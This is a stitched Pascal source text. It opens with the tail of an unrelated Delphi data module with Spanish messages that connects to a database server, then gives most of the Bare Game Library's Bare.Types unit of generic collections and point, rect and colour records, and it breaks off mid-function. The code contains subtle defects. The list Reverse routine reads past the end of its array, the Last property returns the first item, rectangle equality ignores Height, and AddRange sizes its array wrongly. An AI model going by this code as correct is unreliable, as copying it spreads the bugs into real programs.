frmSplash.cmbName.ItemIndex.ToString; frmSplash.Load:= 'Conectando al servidor ' + cntConexion.Params.Values['HostName']; cntConexion.Open; Screen.Cursor := crHourglass; CargarDatos; frmSplash.Free; Screen.Cursor := crDefault; except on E : Exception do begin frmSplash.Load:= 'Imposible conectar con el servidor ' + E.Message; Sleep(3000); Application.Terminate end; end; end; procedure TdmData.Exportar(Grid: TcxGrid); begin with sdExcel do begin if Execute then ExportGridToExcel(FileName, Grid, true, true, false); end; end; procedure TdmData.CargarDatos; procedure Abrir(DataSet: TDataSet); begin DataSet.Open; end; begin Abrir(cdsUsuario); Abrir(cdsCiclo); Abrir(cdsSuelo); Abrir(cdsSistema); Abrir(cdsCultivo); end; end.
(********************************************************) (* *) (* Bare Game Library *) (* http://www.baregame.org *) (* 0.5.0.0 Released under the LGPL license 2013 *) (* *) (********************************************************) { <include docs/bare.types.txt> } unit Bare.Types; {$i bare.inc} interface uses Bare.System; {$region collections} {doc off} type TArrayEnumerator<T> = class private FItems: TArray<T>; FPosition: Integer; public constructor Create(const Items: TArray<T>); function GetCurrent: T; function MoveNext: Boolean; property Current: T read GetCurrent; end; {doc on} { TArrayList\<T\> is a simple extension to dynamic arrays See also <link Overview.Bare.Types.TArrayList, TArrayList members> } TArrayList<T> = record private function GetEmpty: Boolean; function GetFirst: T; procedure SetFirst(const Value: T); function GetLast: T; procedure SetLast(const Value: T); function GetCount: Integer; procedure SetCount(Value: Integer); function GetData: Pointer; function GetItem(Index: Integer): T; procedure SetItem(Index: Integer; const Value: T); public { The array acting as a list } Items: TArray<T>; { The enumerator type for the list } type TEnumerator = TArrayEnumerator<T>; { Get the enumerator for the list } function GetEnumerator: TEnumerator; { Convert a list to an array } class operator Implicit(const Value: TArrayList<T>): TArray<T>; { Convert an array to a list } class operator Implicit(const Value: TArray<T>): TArrayList<T>; { Reverses theitems in the list } procedure Reverse; { Adds and item to the end of the list } procedure Add(const Item: T); { Appends an array of items to the list } procedure AddRange(const Collection: array of T); { Removes an item by index from the list and decresaes the count by one } procedure Delete(Index: Integer); { Set the size of the list to 0 } procedure Clear; { Returns true if ther are no items in the list } property Empty: Boolean read GetEmpty; { First item in the list } property First: T read GetFirst write SetFirst; { Last item in the list } property Last: T read GetFirst write SetLast; { Number of items in the list } property Count: Integer read GetCount write SetCount; { Address where to the first item is located } property Data: Pointer read GetData; { Get or set an item } property Item[Index: Integer]: T read GetItem write SetItem; default; end; { TCollection\<TItem\> it a simple collection of items See also <link Overview.Bare.Types.TCollection, TCollection members> } TCollection<TItem> = class public { The list type } type TItems = TArrayList<TItem>; protected { The list of items } Items: TItems; { Return the number of items in the collection } function GetCount: Integer; public { Get the enumerator for the collection } function GetEnumerator: TItems.TEnumerator; { Number of items in the collection } property Count: Integer read GetCount; end; { TOwnerCollection\<T\> is a simple managed collection of items See also <link Overview.Bare.Types.TOwnerCollection, TOwnerCollection members> } TOwnerCollection<TItem: TObject> = class(TCollection<TItem>) public destructor Destroy; override; end; {doc off} TListEnumerator<TItem> = class private FItems: TArray<TItem>; FCount: Integer; FPosition: Integer; public constructor Create(Items: TArray<TItem>; Count: Integer); function GetCurrent: TItem; function MoveNext: Boolean; property Current: TItem read GetCurrent; end; {doc on} { TComparer\<T\> is a function template which returns -1 when A \< B, 1 when A \> B and 0 when A = B } TComparer<TItem> = function(const A, B: TItem): Integer; { Comparer of objects } function FindObject(const A, B: TObject): Integer; { TList\<TItem\> is a generic growable list of items See also <link Overview.Bare.Types.TList, TList members> } type TList<TItem> = class private FItems: TArray<TItem>; FCount: Integer; FCapacity: Integer; type PItem = ^TItem; procedure CheckBounds(const Method: string; Index: Integer); function GetCapacity: Integer; procedure SetCapacity(Value: Integer); function GetItem(Index: Integer): TItem; procedure SetItem(Index: Integer; const Value: TItem); protected { Allows list types to take action on add } procedure AddItem(constref Item: TItem); virtual; { Allows list types to take action on delete } procedure DeleteItem(var Item: TItem); virtual; { If require delete is true delete item will be called for every item on clear } function RequiresDelete: Boolean; virtual; { Search the list for an equal item } function Find(Comparer: TComparer<TItem>; const Item: TItem): Integer; { Request room for at least a minimum number of items } procedure Grow(MinCapacity: Integer); public { The enumerator type for the list } type TEnumerator = TListEnumerator<TItem>; { Get the enumerator for the list } function GetEnumerator: TEnumerator; destructor Destroy; override; { Add an item to the end of the list } procedure Add(const Item: TItem); { Delete an item by index from the list } procedure Delete(Index: Integer); { Exchange positions of two items in the list } procedure Exchange(A, B: Integer); { Remove all items from the list setting capcity and count to zero } procedure Clear; { Reclaim unused capacity } procedure Compact; { Number of items in the list } property Count: Integer read FCount; { Allocated space in terms of number of items } property Capacity: Integer read GetCapacity write SetCapacity; { Get or set an item in the list Remarks When setting the existing item will be deleted } property Item[Index: Integer]: TItem read GetItem write SetItem; default; end; { TIndexedList\<TItem\> allows for search and removing of items by value See also <link Overview.Bare.Types.TIndexedList, TCollection members> } TIndexedList<TItem> = class(TList<TItem>) public { Returns the index of the item or -1 if it cannot be found } function IndexOf(const Item: TItem): Integer; virtual; abstract; { Return the item by value } function Remove(const Item: TItem): Boolean; end; { TObjectList\<TItem\> holds objects and can optionally be set to manage their life See also <link Overview.Bare.Types.TObjectList, TObjectList members> } TObjectList<TItem: TObject> = class(TIndexedList<TItem>) private FOwnsObjects: Boolean; protected { Frees the items if the list owns the objects } procedure DeleteItem(var Item: TItem); override; { Returns true if the list owns the objects } function RequiresDelete: Boolean; override; public { Create the lsit optionally owning objects added to it } constructor Create(OwnsObjects: Boolean); { Returns the index of the object or -1 if it cannot be found } function IndexOf(const Item: TItem): Integer; override; end; {TODO: TDictionary<K, V> is pretty old and probably needs to be reworked} { TDictionary\<K, V\> holds key value pairs allowing items to be indexed by a key See also <link Overview.Bare.Types.TDictionary, TDictionary members> } TDictionary<K, V> = class public { TDictionary\<K, V\>.TKeyValue holds a key value pairs See also <link Overview.Bare.Types.TDictionary.TKeyValue, TDictionary\<K, V\>.TKeyValue members> } type TKeyValue = class private FKey: K; FValue: V; public { The key } property Key: K read FKey; { The value } property Value: V read FValue write FValue; end; {doc off} TKeyValueEnumerator = class private FList: TList<TKeyValue>; FPosition: Integer; public constructor Create(List: TList<TKeyValue>); function GetCurrent: TKeyValue; function MoveNext: Boolean; property Current: TKeyValue read GetCurrent; end; {doc on} private FList: TList<TKeyValue>; FComparer: TComparer<K>; function KeyEquals(const A, B: K): Boolean; function GetCount: Integer; function GetKey(Index: Integer): K; function GetValue(const Key: K): V; procedure SetValue(const Key: K; const Value: V); public { Create the dictionary } constructor Create; destructor Destroy; override; { Get the enumerator for the list } function GetEnumerator: TKeyValueEnumerator; { Remove an item by key index } procedure Remove(const Key: K); { Remove all items from the dictionary } procedure Clear; { Returns true if the key is in the dictionary } function KeyExists(const Key: K): Boolean; { Used to compare keys } property Comparer: TComparer<K> read FComparer write FComparer; { Keys indexed by integer } property Keys[Index: Integer]: K read GetKey; { Values indexed by key } property Values[const Key: K]: V read GetValue write SetValue; default; { Number of key value pai } property Count: Integer read GetCount; end; {$endregion} {$region types} { TPoint } TPoint = record X, Y: Integer; end; { TRect } TRect = record Left, Top, Right, Bottom: Integer; end; { TPointI } TPointI = record public X, Y: Integer; class operator Implicit(const Value: TPointI): TPoint; class operator Implicit(const Value: TPoint): TPointI; class operator Negative(const A: TPointI): TPointI; class operator Equal(const A, B: TPointI): Boolean; class operator NotEqual(const A, B: TPointI): Boolean; class operator Add(const A, B: TPointI): TPointI; class operator Subtract(const A, B: TPointI): TPointI; function Equals(const Value: TPointI): Boolean; class function Create: TPointI; overload; static; class function Create(X, Y: Integer): TPointI; overload; static; function Angle(const P: TPointI): Float; function Dist(const P: TPointI): Float; function Mid(const P: TPointI): TPointI; procedure Offset(X, Y: Integer); overload; procedure Offset(const P: TPointI); overload; function Move(X, Y: Integer): TPointI; overload; function Move(const P: TPointI): TPointI; overload; end; PPointI = ^TPointI; { TRectI } TRectI = record private function GetEmpty: Boolean; procedure SetTop(Value: Integer); procedure SetLeft(Value: Integer); function GetRight: Integer; procedure SetRight(Value: Integer); function GetBottom: Integer; procedure SetBottom(Value: Integer); function GetSize: TPointI; function GetTopLeft: TPointI; function GetBottomRight: TPointI; function GetMidPoint: TPointI; public X, Y, Width, Height: Integer; class operator Implicit(const Value: TRectI): TRect; class operator Implicit(const Value: TRect): TRectI; class operator Equal(const A, B: TRectI): Boolean; class operator NotEqual(const A, B: TRectI): Boolean; class function Create: TRectI; overload; static; class function Create(Size: TPointI): TRectI; overload; static; class function Create(W, H: Integer): TRectI; overload; static; class function Create(X, Y, W, H: Integer): TRectI; overload; static; function Equals(const Value: TRectI): Boolean; function Contains(X, Y: Integer): Boolean; overload; function Contains(const P: TPointI): Boolean; overload; procedure Center(X, Y: Integer); overload; procedure Center(const P: TPointI); overload; procedure Inflate(X, Y: Integer); overload; procedure Inflate(const P: TPointI); overload; procedure Offset(X, Y: Integer); overload; procedure Offset(const P: TPointI); overload; property Empty: Boolean read GetEmpty; property Left: Integer read X write SetLeft; property Top: Integer read Y write SetTop; property Right: Integer read GetRight write SetRight; property Bottom: Integer read GetBottom write SetBottom; property Size: TPointI read GetSize; property TopLeft: TPointI read GetTopLeft; property BottomRight: TPointI read GetBottomRight; property MidPoint: TPointI read GetMidPoint; end; PRectI = ^TRectI; { TPointF } TPointF = record public X, Y: Float; class operator Implicit(const Value: TPointI): TPointF; class operator Implicit(const Value: TPoint): TPointF; class operator Explicit(const Value: TPointF): TPointI; class operator Explicit(const Value: TPointF): TPoint; class operator Negative(const A: TPointF): TPointF; class operator Equal(const A, B: TPointF): Boolean; class operator NotEqual(const A, B: TPointF): Boolean; class operator Add(const A, B: TPointF): TPointF; class operator Subtract(const A, B: TPointF): TPointF; function Equals(const Value: TPointF): Boolean; class function Create: TPointF; overload; static; class function Create(X, Y: Float): TPointF; overload; static; procedure Offset(X, Y: Float); overload; procedure Offset(const P: TPointF); overload; function Move(X, Y: Float): TPointF; overload; function Move(const P: TPointF): TPointF; overload; function Angle(const P: TPointF): Float; function Dist(const P: TPointF): Float; function Mid(const P: TPointF): TPointF; function Extend(const P: TPointF; Dist: Float): TPointF; function Rotate(const P: TPointF; Angle: Float): TPointF; end; PPointF = ^TPointF; { TRectF } TRectF = record private function GetEmpty: Boolean; procedure SetTop(Value: Float); procedure SetLeft(Value: Float); function GetRight: Float; procedure SetRight(Value: Float); function GetBottom: Float; procedure SetBottom(Value: Float); function GetSize: TPointF; function GetTopLeft: TPointF; function GetTopRight: TPointF; function GetBottomLeft: TPointF; function GetBottomRight: TPointF; function GetMidPoint: TPointF; function GetMidLeft: TPointF; function GetMidTop: TPointF; function GetMidRight: TPointF; function GetMidBottom: TPointF; public X, Y, Width, Height: Float; class operator Implicit(const Value: TRectI): TRectF; class operator Implicit(const Value: TRect): TRectF; class operator Explicit(const Value: TRectF): TRectI; class operator Explicit(const Value: TRectF): TRect; class operator Equal(const A, B: TRectF): Boolean; class operator NotEqual(const A, B: TRectF): Boolean; class function Create: TRectF; overload; static; class function Create(Size: TPointF): TRectF; overload; static; class function Create(W, H: Float): TRectF; overload; static; class function Create(X, Y, W, H: Float): TRectF; overload; static; function Equals(const Value: TRectF): Boolean; function Contains(X, Y: Float): Boolean; overload; function Contains(const P: TPointF): Boolean; overload; procedure Center(X, Y: Float); overload; procedure Center(const P: TPointF); overload; procedure Center(const R: TRectF); overload; procedure Inflate(X, Y: Float); overload; procedure Inflate(const P: TPointF); overload; procedure Offset(X, Y: Float); overload; procedure Offset(const P: TPointF); overload; property Empty: Boolean read GetEmpty; property Left: Float read X write SetLeft; property Top: Float read Y write SetTop; property Right: Float read GetRight write SetRight; property Bottom: Float read GetBottom write SetBottom; property Size: TPointF read GetSize; property TopLeft: TPointF read GetTopLeft; property TopRight: TPointF read GetTopRight; property BottomLeft: TPointF read GetBottomLeft; property BottomRight: TPointF read GetBottomRight; property MidPoint: TPointF read GetMidPoint; property MidLeft: TPointF read GetMidLeft; property MidTop: TPointF read GetMidTop; property MidRight: TPointF read GetMidRight; property MidBottom: TPointF read GetMidBottom; end; PRectF = ^TRectF; { THSL } THSL = record public Hue, Saturation, Lightness: Float; class operator Implicit(Value: Float): THSL; class operator Implicit(const Value: THSL): Float; end; PHSL = ^THSL; { TColorB } TColorB = packed record public class operator Implicit(const Value: THSL): TColorB; class operator Explicit(Value: TColorB): THSL; class function Create(R, G, B: Byte; A: Byte = $FF): TColorB; static; function Blend(Value: TColorB; Percent: Float): TColorB; function Desaturate(Percent: Float): TColorB; function Darken(Percent: Float): TColorB; function Lighten(Percent: Float): TColorB; function Fade(Percent: Float): TColorB; public case Integer of 0: (R, G, B, A: Byte); 1: (Red, Green, Blue, Alpha: Byte); end; PColorB = ^TColorB; TRGBA = TColorB; PRGBA = PColorB; TPixel = TColorB; PPixel = PColorB; { TColorF } TColorF = record public class operator Implicit(const Value: THSL): TColorF; class operator Explicit(const Value: TColorF): THSL; class operator Implicit(Value: TColorB): TColorF; class operator Explicit(const Value: TColorF): TColorB; class function Create(B, G, R: Float; A: Byte = 1): TColorF; static; function Blend(const Value: TColorF; Percent: Float): TColorF; function Desaturate(Percent: Float): TColorF; function Fade(Percent: Float): TColorF; public case Integer of 0: (R, G, B, A: Float); 1: (Red, Green, Blue, Alpha: Float); end; PColorF = ^TColorF; { Color routines } function Hue(H: Float): TColorB; function Blend(A, B: TColorB; Percent: Float): TColorB; function Fade(Color: TColorB; Percent: Float): TColorB; function Darken(Color: TColorB; Percent: Float): TColorB; function Lighten(Color: TColorB; Percent: Float): TColorB; {$endregion} implementation uses Bare.Constants; {$region collections} { TArrayEnumerator<T> } constructor TArrayEnumerator<T>.Create(const Items: TArray<T>); begin inherited Create; FItems := Items; FPosition := -1; end; function TArrayEnumerator<T>.GetCurrent: T; begin Result := FItems[FPosition]; end; function TArrayEnumerator<T>.MoveNext: Boolean; begin Inc(FPosition); Result := FPosition < Length(FItems); end; { TArrayList<T> } function TArrayList<T>.GetEnumerator: TEnumerator; begin Result := TEnumerator.Create(Items); end; class operator TArrayList<T>.Implicit(const Value: TArrayList<T>): TArray<T>; begin Result := Value.Items; end; class operator TArrayList<T>.Implicit(const Value: TArray<T>): TArrayList<T>; begin Result.Items := Value; end; procedure TArrayList<T>.Reverse; var Swap: T; I, J: Integer; begin I := 0; J := Length(Items); while I < J do begin Swap := Items[I]; Items[I] := Items[J]; Items[J] := Swap; Inc(I); Dec(J); end; end; procedure TArrayList<T>.Add(const Item: T); var I: Integer; begin I := Length(Items); SetLength(Items, I + 1); Items[I] := Item; end; procedure TArrayList<T>.AddRange(const Collection: array of T); var I, J: Integer; begin I := Length(Items); J := High(Collection); if J < 1 then Exit; SetLength(Items, I + J); for J := Low(Collection) to High(Collection) do begin Items[I] := Collection[J]; Inc(I); end; end; procedure TArrayList<T>.Delete(Index: Integer); var I, J: Integer; begin I := Length(Items) - 1; for J := Index + 1 to I do Items[J - 1] := Items[J]; SetLength(Items, I); end; procedure TArrayList<T>.Clear; begin Items := nil; end; function TArrayList<T>.GetEmpty: Boolean; begin Result := Length(Items) = 0; end; function TArrayList<T>.GetFirst: T; begin Result := Items[0]; end; procedure TArrayList<T>.SetFirst(const Value: T); begin Items[0] := Value; end; function TArrayList<T>.GetLast: T; begin Result := Items[Length(Items) - 1]; end; procedure TArrayList<T>.SetLast(const Value: T); begin Items[Length(Items) - 1] := Value; end; function TArrayList<T>.GetCount: Integer; begin Result := Length(Items); end; procedure TArrayList<T>.SetCount(Value: Integer); begin if Value <> Length(Items) then SetLength(Items, Value); end; function TArrayList<T>.GetData: Pointer; begin Result := @Items[0]; end; function TArrayList<T>.GetItem(Index: Integer): T; begin Result := Items[Index]; end; procedure TArrayList<T>.SetItem(Index: Integer; const Value: T); begin Items[Index] := Value; end; { TCollection<TItem> } function TCollection<TItem>.GetEnumerator: TItems.TEnumerator; begin Result := Items.GetEnumerator; end; function TCollection<TItem>.GetCount: Integer; begin Result := Items.Count; end; { TOwnerCollection<T> } destructor TOwnerCollection<TItem>.Destroy; var I: Integer; begin for I := 0 to Items.Count - 1 do Items[I].Free; Items := nil; inherited Destroy; end; { TListEnumerator<TItem> } constructor TListEnumerator<TItem>.Create(Items: TArray<TItem>; Count: Integer); begin inherited Create; FItems := Items; FCount := Count; FPosition := -1; end; function TListEnumerator<TItem>.GetCurrent: TItem; begin Result := FItems[FPosition]; end; function TListEnumerator<TItem>.MoveNext: Boolean; begin Inc(FPosition); Result := FPosition < FCount; end; function TList<TItem>.GetEnumerator: TEnumerator; begin Result := TEnumerator.Create(FItems, FCount); end; procedure TList<TItem>.AddItem(constref Item: TItem); begin Grow(FCount + 1); FItems[FCount] := Item; Inc(FCount); end; procedure TList<TItem>.DeleteItem(var Item: TItem); begin Item := default(TItem); end; function TList<TItem>.RequiresDelete: Boolean; begin Result := False; end; function TList<TItem>.Find(Comparer: TComparer<TItem>; const Item: TItem): Integer; var I: Integer; begin for I := Low(FItems) to High(FItems) do if Comparer(Item, FItems[I]) = 0 then Exit(I); Result := -1; end; procedure TList<TItem>.Grow(MinCapacity: Integer); begin if MinCapacity > FCapacity then begin if MinCapacity < 10 then MinCapacity := 10; FCapacity := MinCapacity + FCapacity div 4; SetLength(FItems, FCapacity); end; end; destructor TList<TItem>.Destroy; begin Clear; inherited Destroy; end; procedure TList<TItem>.CheckBounds(const Method: string; Index: Integer); begin if (Index < 0) or (Index >= FCount) then raise ERangeError.CreateFmt(SRangeMethodError, [ClassName, Method]); end; procedure TList<TItem>.Clear; var I: Integer; begin if FCount = 0 then Exit; if RequiresDelete then for I := Low(FItems) to High(Fitems) do DeleteItem(FItems[I]); FCount := 0; FCapacity := 0; FItems := nil; end; procedure TList<TItem>.Compact; begin if FCount = 0 then Clear else begin SetLength(FItems, FCount); FCapacity := FCount; end; end; procedure TList<TItem>.Add(const Item: TItem); begin AddItem(Item); end; procedure TList<TItem>.Delete(Index: Integer); var I: Integer; begin CheckBounds('Delete', Index); DeleteItem(FItems[Index]); for I := Index + 1 to High(FItems) do FItems[I - 1] := FItems[I]; if Index <> High(FItems) then FItems[High(FItems)] := default(TItem); end; procedure TList<TItem>.Exchange(A, B: Integer); var I: TItem; begin CheckBounds('Exchange', A); CheckBounds('Exchange', B); I := FItems[A]; FItems[A] := FItems[B]; FItems[B] := I; end; function TList<TItem>.GetCapacity: Integer; begin Result := FCapacity; end; procedure TList<TItem>.SetCapacity(Value: Integer); begin if Value > FCapacity then Grow(Value); end; function TList<TItem>.GetItem(Index: Integer): TItem; begin CheckBounds('GetItem', Index); Result := FItems[Index]; end; procedure TList<TItem>.SetItem(Index: Integer; const Value: TItem); begin CheckBounds('SetItem', Index); DeleteItem(FItems[Index]); FItems[Index] := Value; end; { TIndexedList<TItem> } function TIndexedList<TItem>.Remove(const Item: TItem): Boolean; var I: Integer; begin I := IndexOf(Item); Result := (I > -1) and (I < Count); if Result then Delete(I); end; { TObjectList<TItem> } constructor TObjectList<TItem>.Create(OwnsObjects: Boolean); begin inherited Create; FOwnsObjects := OwnsObjects; end; procedure TObjectList<TItem>.DeleteItem(var Item: TItem); begin if FOwnsObjects then Item.Free; Item := nil; end; function TObjectList<TItem>.RequiresDelete: Boolean; begin Result := FOwnsObjects; end; function FindObject(const A, B: TObject): Integer; begin Result := PtrInt(A) - PtrInt(B); end; function TObjectList<TItem>.IndexOf(const Item: TItem): Integer; begin Result := Find(TComparer<TItem>(@FindObject), Item); end; { TDictionary<K, V>.TKeyValueEnumerator } constructor TDictionary<K, V>.TKeyValueEnumerator.Create(List: TList<TKeyValue>); begin inherited Create; FList := List; FPosition := -1; end; function TDictionary<K, V>.TKeyValueEnumerator.GetCurrent: TKeyValue; begin Result := TKeyValue(FList[FPosition]); end; function TDictionary<K, V>.TKeyValueEnumerator.MoveNext: Boolean; begin Inc(FPosition); Result := FPosition < FList.Count; end; { TDictionary<K, V> } constructor TDictionary<K, V>.Create; begin inherited Create; FList := TList<TKeyValue>.Create; end; destructor TDictionary<K, V>.Destroy; begin Clear; inherited Destroy; end; function TDictionary<K, V>.KeyEquals(const A, B: K): Boolean; begin if Assigned(FComparer) then Result := FComparer(A, B) = 0 else Result := A = B; end; function TDictionary<K, V>.GetEnumerator: TKeyValueEnumerator; begin Result := TKeyValueEnumerator.Create(FList); end; procedure TDictionary<K, V>.Remove(const Key: K); var KeyValue: TKeyValue; I: Integer; begin I := 0; repeat KeyValue := TKeyValue(FList[I]); if KeyEquals(KeyValue.Key, Key) then begin KeyValue.Free; FList.Delete(I); Exit; end; Inc(I); until False; end; procedure TDictionary<K, V>.Clear; var I: Integer; begin for I := 0 to FList.Count - 1 do TObject(FList[I]).Free; FList.Clear; end; function TDictionary<K, V>.KeyExists(const Key: K): Boolean; var KeyValue: TKeyValue; I: Integer; begin for I := 0 to FList.Count - 1 do begin KeyValue := TKeyValue(FList[I]); if KeyEquals(KeyValue.Key, Key) then Exit(True); end; Result := False; end; function TDictionary<K, V>.GetCount: Integer; begin Result := FList.Count; end; function TDictionary<K, V>.GetKey(Index: Integer): K; begin Result := TKeyValue(FList[Index]).Key; end; function TDictionary<K, V>.GetValue(const Key: K): V; var KeyValue: TKeyValue; I: Integer; begin I := 0; repeat KeyValue := TKeyValue(FList[I]); if KeyEquals(KeyValue.Key, Key) then Exit(KeyValue.Value); Inc(I); until False; end; procedure TDictionary<K, V>.SetValue(const Key: K; const Value: V); var KeyValue: TKeyValue; I: Integer; begin for I := 0 to FList.Count - 1 do begin KeyValue := TKeyValue(FList[I]); if KeyEquals(KeyValue.Key, Key) then begin KeyValue.Value := Value; Exit; end; end; KeyValue := TKeyValue.Create; KeyValue.FKey := Key; KeyValue.FValue := Value; FList.Add(KeyValue); end; {$endregion} {$region types} { TPointI } class operator TPointI.Implicit(const Value: TPointI): TPoint; var R: TPoint absolute Value; begin Result := R; end; class operator TPointI.Implicit(const Value: TPoint): TPointI; var R: TPointI absolute Value; begin Result := R; end; class operator TPointI.Negative(const A: TPointI): TPointI; begin Result.X := -A.X; Result.Y := -A.Y; end; class operator TPointI.Equal(const A, B: TPointI): Boolean; begin Result := A.Equals(B); end; class operator TPointI.NotEqual(const A, B: TPointI): Boolean; begin Result := not A.Equals(B); end; class operator TPointI.Add(const A, B: TPointI): TPointI; begin Result.X := A.X + B.X; Result.Y := A.Y + B.Y; end; class operator TPointI.Subtract(const A, B: TPointI): TPointI; begin Result.X := A.X - B.X; Result.Y := A.Y - B.Y; end; class function TPointI.Create: TPointI; begin Result.X := 0; Result.Y := 0; end; class function TPointI.Create(X, Y: Integer): TPointI; begin Result.X := X; Result.Y := Y; end; function TPointI.Equals(const Value: TPointI): Boolean; begin Result := (X = Value.X) and (Y = Value.Y); end; function TPointI.Angle(const P: TPointI): Float; begin Result := TPointF(Self).Angle(P); end; function TPointI.Dist(const P: TPointI): Float; begin Result := TPointF(Self).Dist(P); end; function TPointI.Mid(const P: TPointI): TPointI; begin Result := TPointI(TPointF(Self).Mid(P)); end; procedure TPointI.Offset(X, Y: Integer); begin Inc(Self.X, X); Inc(Self.Y, Y); end; procedure TPointI.Offset(const P: TPointI); begin Inc(X, P.X); Inc(Y, P.Y); end; function TPointI.Move(X, Y: Integer): TPointI; begin Result.X := Self.X + X; Result.Y := Self.Y + Y; end; function TPointI.Move(const P: TPointI): TPointI; begin Result.X := X + P.X; Result.Y := Y + P.Y; end; { TRectI } class operator TRectI.Implicit(const Value: TRectI): TRect; begin Result.Left := Value.X; Result.Top := Value.Y; Result.Right := Value.X + Value.Width; Result.Bottom := Value.Y + Value.Height; end; class operator TRectI.Implicit(const Value: TRect): TRectI; begin Result.X := Value.Left; Result.Y := Value.Top; Result.Width := Value.Right - Value.Left; Result.Height := Value.Bottom - Value.Top; end; class operator TRectI.Equal(const A, B: TRectI): Boolean; begin Result := A.Equals(B); end; class operator TRectI.NotEqual(const A, B: TRectI): Boolean; begin Result := not A.Equals(B); end; class function TRectI.Create: TRectI; begin Result.X := 0; Result.Y := 0; Result.Width := 0; Result.Height := 0; end; class function TRectI.Create(Size: TPointI): TRectI; begin Result.X := 0; Result.Y := 0; Result.Width := Size.X; Result.Height := Size.Y; end; class function TRectI.Create(W, H: Integer): TRectI; begin Result.X := 0; Result.Y := 0; Result.Width := W; Result.Height := H; end; class function TRectI.Create(X, Y, W, H: Integer): TRectI; begin Result.X := X; Result.Y := Y; Result.Width := W; Result.Height := H; end; function TRectI.Equals(const Value: TRectI): Boolean; begin Result := (X = Value.X) and (Y = Value.Y) and (Width = Value.Width) and (Width = Value.Width); end; function TRectI.Contains(X, Y: Integer): Boolean; begin Result := Contains(TPointI.Create(X, Y)); end; function TRectI.Contains(const P: TPointI): Boolean; begin if Empty then Exit(False); Result := (X <= P.X) and (X + Width > P.X) and (Y <= P.Y) and (Y + Height > P.Y); end; procedure TRectI.Center(X, Y: Integer); begin Self.X := X - Width shr 1; Self.Y := Y - Height shr 1; end; procedure TRectI.Center(const P: TPointI); begin X := P.X - Width shr 1; Y := P.Y - Height shr 1; end; procedure TRectI.Inflate(X, Y: Integer); begin Dec(Self.X, X); Inc(Width, X shl 1); Dec(Self.Y, Y); Inc(Height, Y shl 1); end; procedure TRectI.Inflate(const P: TPointI); begin Dec(X, P.X); Inc(Width, P.X shl 1); Dec(Y, P.Y); Inc(Height, P.Y shl 1); end; procedure TRectI.Offset(X, Y: Integer); begin Inc(Self.X, X); Inc(Self.Y, Y); end; procedure TRectI.Offset(const P: TPointI); begin Inc(X, P.X); Inc(Y, P.Y); end; function TRectI.GetEmpty: Boolean; begin Result := (Width < 1) or (Height < 1); end; procedure TRectI.SetLeft(Value: Integer); var I: Integer; begin I := X + Width; X := Value; Width := I - X; end; procedure TRectI.SetTop(Value: Integer); var I: Integer; begin I := Y + Height; Y := Value; Height := I - Y; end; function TRectI.GetRight: Integer; begin Result := X + Width; end; procedure TRectI.SetRight(Value: Integer); begin Width := Value - X; end; function TRectI.GetBottom: Integer; begin Result := Y + Height; end; procedure TRectI.SetBottom(Value: Integer); begin Height := Value - Y; end; function TRectI.GetSize: TPointI; begin Result := TPointI.Create(Width, Height); end; function TRectI.GetTopLeft: TPointI; begin Result := TPointI.Create(X, Y); end; function TRectI.GetBottomRight: TPointI; begin Result := TPointI.Create(X + Width, Y + Height); end; function TRectI.GetMidPoint: TPointI; begin Result := TPointI.Create(X + Width div 2, Y + Height div 2); end; { TPointF } class operator TPointF.Implicit(const Value: TPointI): TPointF; begin Result.X := Value.X; Result.Y := Value.Y; end; class operator TPointF.Implicit(const Value: TPoint): TPointF; begin Result.X := Value.X; Result.Y := Value.Y; end; class operator TPointF.Explicit(const Value: TPointF): TPointI; begin Result.X := Round(Value.X); Result.Y := Round(Value.Y); end; class operator TPointF.Explicit(const Value: TPointF): TPoint; begin Result.X := Round(Value.X); Result.Y := Round(Value.Y); end; class operator TPointF.Negative(const A: TPointF): TPointF; begin Result.X := -A.X; Result.Y := -A.Y; end; class operator TPointF.Equal(const A, B: TPointF): Boolean; begin Result := A.Equals(B); end; class operator TPointF.NotEqual(const A, B: TPointF): Boolean; begin Result := not A.Equals(B); end; class operator TPointF.Add(const A, B: TPointF): TPointF; begin Result.X := A.X + B.X; Result.Y := A.Y + B.Y; end; class operator TPointF.Subtract(const A, B: TPointF): TPointF; begin Result.X := A.X - B.X; Result.Y := A.Y - B.Y; end; class function TPointF.Create: TPointF; begin Result.X := 0; Result.Y := 0; end; class function TPointF.Create(X, Y: Float): TPointF; begin Result.X := X; Result.Y := Y; end; function TPointF.Equals(const Value: TPointF): Boolean; begin Result := (X = Value.X) and (Y = Value.Y); end; procedure TPointF.Offset(X, Y: Float); begin Self.X := Self.X + X; Self.Y := Self.Y + Y; end; procedure TPointF.Offset(const P: TPointF); begin X := X + P.X; Y := Y + P.Y; end; function TPointF.Move(X, Y: Float): TPointF; begin Result.X := Self.X + X; Result.Y := Self.Y + Y; end; function TPointF.Move(const P: TPointF): TPointF; begin Result.X := X + P.X; Result.Y := Y + P.Y; end; function TPointF.Angle(const P: TPointF): Float; var X, Y: Float; begin X := Self.X - P.X; Y := Self.Y - P.Y; if X = 0 then if Y < 0 then Exit(Pi) else Exit(0); Result := Arctan(Y / X) + Pi / 2; if X > 0 then Result := Result + Pi; end; function TPointF.Dist(const P: TPointF): Float; var X, Y: Float; begin X := Self.X - P.X; Y := Self.Y - P.Y; Result := Sqrt(X * X + Y * Y); end; function TPointF.Mid(const P: TPointF): TPointF; begin Result.X := (X + P.X) / 2; Result.Y := (Y + P.Y) / 2; end; function TPointF.Extend(const P: TPointF; Dist: Float): TPointF; var X, Y, R: Float; begin X := Self.X - P.X; Y := Self.Y - P.Y; R := Sqrt(X * X + Y * Y); if R = 0 then Exit(Self); R := 1 / R; Result.X := Self.X - X * R * Dist; Result.Y := Self.Y - Y * R * Dist; end; function TPointF.Rotate(const P: TPointF; Angle: Float): TPointF; var S, C: Float; X, Y: Float; begin if Angle = 0 then Exit(P); SinCos(Angle, S, C); X := Self.Y * S - Self.X * C + Self.X; Y := -Self.X * S - Self.Y * C + Self.Y; Result.X := P.X * C - P.Y * S + X; Result.Y := P.X * S + P.Y * C + Y; end; { TRectF } class operator TRectF.Implicit(const Value: TRectI): TRectF; begin Result.X := Value.X; Result.Y := Value.Y; Result.Width := Value.Width; Result.Height := Value.Height; end; class operator TRectF.Implicit(const Value: TRect): TRectF; begin Result.X := Value.Left; Result.Y := Value.Top; Result.Width := Value.Right - Value.Left; Result.Height := Value.Bottom - Value.Top; end; class operator TRectF.Explicit(const Value: TRectF): TRectI; begin Result.X := Round(Value.X); Result.Y := Round(Value.Y); Result.Width := Round(Value.Width); Result.Height := Round(Value.Height); end; class operator TRectF.Explicit(const Value: TRectF): TRect; begin Result.Left := 